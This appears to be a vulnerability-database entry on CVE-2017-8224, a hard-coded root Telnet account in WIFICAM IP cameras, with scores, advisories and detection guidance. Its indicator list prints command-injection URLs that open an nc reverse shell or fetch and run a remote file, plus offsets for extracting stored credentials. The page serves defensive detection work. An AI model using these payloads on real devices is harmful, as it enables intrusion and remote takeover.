CVE-2017-8224
published 2017-04-25CVE-2017-8224: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.
PriorityP180critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.58%
94.4th percentile
Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.
Detection & IOCsextracted from sources · hover to see the quote
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0↗
url/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://192.168.1.1/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0↗
bytes↗
0x0a 0x0a 0x0a 0x0a 0x01
- →Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi containing shell metacharacters (e.g., $(), nc, wget) in the `pwd` parameter — this is the command injection vector for RCE. ↗
- →Detect inbound Telnet connections to the device — the backdoor root account is accessible via Telnet. ↗
- →In captured binary config dumps from the device, credentials are located at offset +138 (username) and +170 (password) bytes after the 4-byte 0x0a sequence followed by 0x01; the default username is 'admin'. ↗
- ·The exploit targets port 80 (CAM_PORT) by default; the camera's web interface may be hosted on a non-standard port in some deployments, requiring port-agnostic detection on the CGI paths. ↗
- ·The connect-back shell uses a hardcoded attacker IP (REMOTE_HOST 192.168.1.1) and port (REMOTE_PORT 1337) in the PoC; real-world attacks will substitute arbitrary attacker-controlled values in the `pwd` parameter. ↗
- ·Two alternative payload forms exist for the injection: URL-encoded spaces (%20) and plus-sign-encoded spaces (+) — detection signatures must account for both encoding variants. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r97g-5x4p-h964: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET
ghsa_unreviewed·2022-05-17
CVE-2017-8224 [CRITICAL] CWE-798 GHSA-r97g-5x4p-h964: Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET
Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.
VulnCheck
wificam wireless_ip_camera_\(p2p\)_firmware Use of Hard-coded Credentials
vulncheck·2017·CVSS 9.8
CVE-2017-8224 [CRITICAL] wificam wireless_ip_camera_\(p2p\)_firmware Use of Hard-coded Credentials
wificam wireless_ip_camera_\(p2p\)_firmware Use of Hard-coded Credentials
Wireless IP Camera (P2P) WIFICAM devices have a backdoor root account that can be accessed with TELNET.
Affected: wificam wireless_ip_camera_\(p2p\)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
No detection rules found.
No writeups or analysis indexed.
2017-04-25
Published
Exploited in the wild